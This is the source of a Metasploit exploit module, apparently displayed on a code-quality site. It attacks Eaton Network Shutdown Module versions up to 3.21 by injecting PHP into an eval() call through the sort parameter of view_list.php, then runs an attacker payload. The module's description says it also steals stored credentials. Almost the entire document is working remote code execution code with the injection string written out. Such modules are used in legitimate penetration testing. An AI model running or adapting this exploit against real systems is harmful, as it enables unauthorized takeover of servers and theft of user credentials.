modules/exploits/multi/http/eaton_nsm_code_exec.rb from rapid7/metasploit-framework

modules/exploits/multi/http/eaton_nsm_code_exec.rb
Summary

Maintainability

1 hr
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Shutdown Module (sort_values) Remote PHP Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in Eaton Network Shutdown Module
        version <= 3.21, in lib/dbtools.inc which uses unsanitized user input
        inside a eval() call. Additionally the base64 encoded user credentials
        are extracted from the database of the application. Please note that
        in order to be able to steal credentials, the vulnerable service must
        have at least one USV module (an entry in the "nodes" table in
        mgedb.db)
      },
      'Author'         =>
        [
          'h0ng10',  # original discovery, msf module
          'sinn3r'   # PhpEXE shizzle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83199'],
          ['URL', 'http://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000
        },
      'Platform'       => %w{ linux php },
      'Arch'           => ARCH_PHP,

      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => '2012-06-26'
    ))

    register_options(
      [
        Opt::RPORT(4679)
      ])
  end

  def check
    # we use a call to phpinfo() for verification
    res = execute_php_code("phpinfo();die();")

    if not res or res.code != 200
      vprint_error("Failed: Error requesting page")
      return CheckCode::Unknown
    end

    return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
    return CheckCode::Safe
  end

  def execute_php_code(code, opts = {})
    param_name = rand_text_alpha(6)
    padding    = rand_text_alpha(6)
    url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
        'uri'   =>  '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param,
          },
        'vars_post' =>
          {
            param_name => Rex::Text.encode_base64(code),
          },
        'headers' =>
          {
            'Connection' => 'Close',
          }
      })
  end

  def no_php_tags(p)
    p = p.gsub(/^<\?php /, '')
    p.gsub(/ \?\>$/, '')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending payload")

    unlink = (target['Platform'] == 'linux') ? true : false
    p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

    execute_php_code(p)
    handler
  end
end